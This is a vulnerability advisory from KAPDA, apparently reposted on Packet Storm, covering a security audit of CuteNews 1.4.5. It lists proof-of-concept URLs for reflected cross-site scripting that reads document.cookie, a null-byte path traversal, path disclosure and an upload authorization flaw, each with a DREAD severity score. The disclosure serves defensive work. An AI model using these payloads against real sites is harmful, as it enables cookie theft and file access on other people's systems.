KAPDA Advisory - CuteNews version 1.4.5 suffers from multiple cross site scripting, local file inclusion, and other vulnerabilities.
4c60f4a2e8964c418a42187809d6a4b9bd58f8e9ddce32d159c9cd5222384229
Product: cutenews 1.4.5
Vendor: http://cutephp.com
The Results through security analysis of cutenews
1.4.5
[provided by KAPDA.ir]
--------------------------------------------------
Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES
Statistical Results from 'security Audit' perspective
TOTAL UNIQUE BUGS (12)
Number of integration errors: 3
Type: Path Disclosure , Authorization error
(privileges escalation), XSS
PoC:index.php?debug
DREAD Severity: 7 (Low)
PoC:index.php?mod=images&subaction=upload
DREAD Severity: 12 (Medium)
PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
Number of Technical errors: 9
Type: XSS ,Html Injection, Path disclosure, Path
traversal
PoC:show_news.php?KAPDA="><script>alert()</script>
DREAD Severity: 7 (Low)
PoC:index.php?mod=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
DREAD Severity: 8 (Medium)
PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:Story
field:</textarea><script>alert(document.cookie)</script>
DREAD Severity: 12 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&selected_news=)
DREAD Severity: 7 (Low)
PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=../upimages/ddddd.php%00
DREAD Severity: 10 (Medium)
Number of Logical errors: 0
Statistical Results from 'functional Risk Base'
perspective
Authentication mechanism: passed
Use a policy of least-privileged accounts: passed
Session Management: passed
Cookie Management: passed
Sensitive Data Management: passed
Cryptography:passed
Error handling: Passed But with negligence
Authorization: Passed But with negligence
Configuration Management:Passed But with negligence
PHP Coding Performance: Passed But with negligence
Security by design: Passed But with negligence
Note: using Extract() improperly, leads to several
cross site scripting bugs.
Input/Data validation: Not passed
Auditing and Logging: Not Passed
Statistical Results from 'Security Metrics'
perspective
Number of discovered bugs: 15
Number of reviewed Code Lines: 6000
Bugs per 10KLOC: 25
Vulnerabilities severity average: Low
Number of discovered bugs after stable release: 15
Number of 'Documents' pages relevant to security: 1
Quality of Security support: Moderate
Security Grade at the current version (1.4.5) From
Kapda : B-
Note: All Grades are: A , B+ , B , B- , C+ , C , C- ,
D
Reference: http://www.kapda.ir/advisory-450.html
____________________________________________________________________________________
Sponsored Link
Online degrees - find the right program to advance your career.
Www.nextag.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed